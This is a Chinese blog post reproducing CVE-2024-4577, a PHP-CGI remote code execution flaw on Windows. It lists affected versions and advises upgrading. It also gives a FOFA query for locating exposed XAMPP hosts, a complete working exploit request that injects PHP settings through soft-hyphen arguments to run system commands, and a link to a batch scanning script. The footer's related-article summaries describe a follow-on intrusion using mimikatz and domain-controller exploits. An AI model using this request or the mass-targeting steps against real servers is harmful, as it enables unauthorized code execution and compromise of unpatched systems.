PHP_CGL远程代码执行漏洞复现CVE-2024-4577(含批量检测脚本)

已于 2024-07-31 19:05:25 修改
阅读量244 收藏
点赞数 1
文章标签: php 开发语言
于 2024-07-31 18:29:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79406077/article/details/140829630
版权

**漏洞概述**

CVE-2024-4577是一个影响在Windows平台上运行的PHP CGI的远程代码执行漏洞。

漏洞的存在是因为PHP在设计时未能预见到Windows的Best-Fit字符编码转换特性,这使得攻击者可以通过构造特定的请求来绕过安全限制。受影响的环境包括使用特定语系设置的Windows系统,如简体中文(936)、繁体中文(950)和日文(932)。

**影响范围**

PHP 8.3 < 8.3.8

PHP 8.2 < 8.2.20

PHP 8.1 < 8.1.29

其他版本的PHP官方已不在维护,建议根据实际情况升级到安全版本或者关闭php-cgi的使用。

网络测绘


fofa: app="XAMPP"

 

复现

1b5140752f354a0bad25b49cd6b47e0d.png

POC

POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: x.x.x.x
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

<?php system("echo 1008"); ?>

ec62828515164685b8fd4e92db411283.png

 

批量验证POC地址https://github.com/Jcccccx/CVE-2024-4577


6a399ca4025b4b8aa15448aec6795291.png
执行命令

d0a7bc51fee24880bfe0d19ace6a35a6.png

 

jxxxxx.
关注
PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
做自己喜欢的事,并将其发挥到极致!
06-11 2185
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码
PhpMyAdmin远程执行代码漏洞复现CVE-2016-5734)
千寻的博客
03-21 1506
phpMyAdmin`中存在安全漏洞,该漏洞源于程序没有正确选择分隔符来避免使用`preg_replace e`修饰符。远程攻击者可借助特制的字符串利用该漏洞执行任意PHP代码
CVE-2024-4577-WINDOWS远程代码执行漏洞gelshell
m0_70266827的博客
06-27 962
PHP 在设计时并未充分考虑到 Windows 系统中对字符转换的 "Best-Fit" 特性。当 PHP-CGI(PHP 的通用网关接口实现,常用于 Windows 平台的 Web 服务器)在 Windows 平台上运行时,特别是在使用如中文等语系时,攻击者有可能利用这一特性构造恶意请求。这些恶意请求能够绕过 CVE-2012-1823 补丁的防护措施,导致攻击者可在 PHP 服务器上执行任意 PHP 代码PHP Windows版 8.3.0
XAMPP默认环境CVE-2024-4577 PHP CGI 远程代码执行漏洞复现
最新发布
m0_74321564的博客
08-25 1247
XAMPP默认环境CVE-2024-4577 PHP CGI 远程代码执行漏洞复现CVE-2024-4577是一个影响在Windows平台上运行的PHP CGI的远程代码执行漏洞漏洞的存在是因为PHP在设计时未能预见到Windows的Best-Fit字符编码转换特性,这使得攻击者可以通过构造特定的请求来绕过安全限制。受影响的环境包括使用特定语系设置的Windows系统,如简体中文(936)、繁体中文(950)和日文(932)
漏洞分析 | PHP CGI Windows平台远程代码执行漏洞CVE-2024-4577
WangsuSecurity的博客
07-05 1158
目前该漏洞的细节已公开,鉴于该漏洞易于利用,且可远程执行命令,建议所有受影响的企业尽快升级修复。
探秘PHP安全新挑战:CVE-2024-4577漏洞利用工具深度剖析
gitblog_00069的博客
06-18 451
探秘PHP安全新挑战:CVE-2024-4577漏洞利用工具深度剖析 项目地址:https://gitcode.com/watchtowrlabs/CVE-2024-4577 在网络安全的无尽战场上,每一个细节都可能成为攻防转换的关键。今天,我们将深入探讨一个由@watchTowr精心打造的开源项目,该工具专注于演示并利用名为CVE-2024-4577PHP CGI注入漏洞,在Windows环境...
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
weixin_45653478的博客
06-27 948
CVE-2024-4577是一个在Windows平台上运行的PHP CGI(Common Gateway Interface)的远程代码执行漏洞。该漏洞的存在主要是因为PHP在设计时未能预见到Windows系统的Best-Fit字符编码转换特性,导致攻击者可以通过构造特定的请求来绕过安全限制,从而在远程PHP服务器上执行任意代码
12-4 Nginx漏洞复现与分析
weixin_43263566的博客
11-29 1590
CGl: CGl是一种协议,用于定义Nginx或其他Web Server传递的数据格式。CGl是一个独立的程序,与Web Server无关,可以用任何语言编写CGl程序,比如C、Perl、Python等。Fastcgi: Fastcgi:是一种协议,前身是CGI,可以简单理解为是优化版的CGI,具有更高的稳定性和性能。PHP-CGI: 只是一个PHP的解释器,本身只能解析请求并返回结果,不会做进程管理。
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1255
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
coin-or-Cgl-devel-0.59.9-1.el7.x86_64.rpm
11-29
coin-or-Cgl-devel-0.59.9-1.el7.x86_64.rpm
coin-or-Cgl-doc-0.59.9-1.el7.noarch.rpm
11-29
coin-or-Cgl-doc-0.59.9-1.el7.noarch.rpm
PHP-CGI的漏洞CVE-2024-4577
qq_64395221的博客
06-24 1491
通过前两篇文章的铺垫,现在我们可以了解 CVE-2024-4577这个漏洞的原理CVE-2024-4577CVE-2012-1823这个老漏洞的绕过,php cgi的老漏洞至今已经12年,具体可以参考我的另一个文档简单来说,就是使用cgi模式运行的PHP,根据RFC3875的规定,Apache会将请求的QUERY_STRING作为命令行参数交给php-cgi执行。攻击者利用这个特性,就可以-d选项修改PHP的配置项,最后执行任意代码
通过CVE-2024-4577 PHP CGI 远程代码执行入口的一次渗透
Success696的博客
06-25 2037
mimikatz抓取明文密码未成功,高版本禁止了,尝试域控提权,ms14068,CVE-2021-42287,CVE-2022-26923均不行,只有CVE-2020-1472可以利用,但该漏洞会将域内环境直接破坏(由于第一次操作时重置了域控密码,导致域内环境被破坏,无法进行复现),实操尽量多注意,至此,全部拿下。为了后续利用,还是想办法让他上线到远控工具,这里有web服务,进行文件上传较为简单,但需要知道一个网站目录,但我们已经可以执行命令,所以还是可以找到的。
PHP CGI Windows平台远程代码执行漏洞CVE-2024-4577) 有POC!!!!!
WuYSec的博客
06-07 3812
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码
漏洞复现PHP-CGI——Best-Fit——代码执行CVE-2024-4577
LongL_GuYu的博客
07-12 805
PHP-CGI 是一种用于在 Web 服务器上运行 PHP 脚本的接口,通过 CGI(公共网关接口)将 PHP 解释器与 Web 服务器连接。PHP 在设计时忽略 Windows 中对字符转换的`Best-Fit`特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 927
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
漏洞复现CVE-2024-4577PHP CGI Windows平台远程代码执行漏洞
信安百科
06-09 1590
漏洞复现CVE-2024-4577PHP CGI Windows平台远程代码执行漏洞
漏洞复现-PHP-CGI Windows平台远程代码执行漏洞CVE-2024-4577
玄道的网安博客
08-12 1025
语言在设计时忽略了Windows系统内部对字符编码转换的Best-Fit特性,当PHP运行在Window平台且使用了如繁体中文(代码页950)、简体中文(代码页936)和日文(代码页932)等语系时,威胁者可构造恶意请求绕过CVE-2012-1823的保护,通过参数注入等攻击在目标PHP服务器上远程执行代码。结合上面的特性,你可以通过传%ad来传入一个"-",这样在-之后的部分就会成为php-cgi的参数。只有php-cgi.exe是granted的,我们把视角还是回到php-cgi上。
漏洞复现PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
网络安全从业者的学习笔记
06-10 1691
导致漏洞产生的本质其实是Windows系统内字符编码转换的Best-Fit特性导致的。由于Windows系统内字符编码转换的Best-Fit特性导致PHP原本的安全限制被绕过,再加上一些特殊的PHP CGI环境配置导致了这个问题。目前,官方已发布修复建议,建议受影响的用户尽快升级至安全版本。无需任何配置信息修改。
Android NDK集成与eclipse使用教程:hello-jni实践
在Android开发中,NDK(Native Development Kit)是一个至关重要的工具集,它允许开发者使用C和C++语言编写部分应用程序,以实现更高的性能和代码复用。NDK提供了一套交叉编译工具链,能够将这些低级语言编译成.so库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值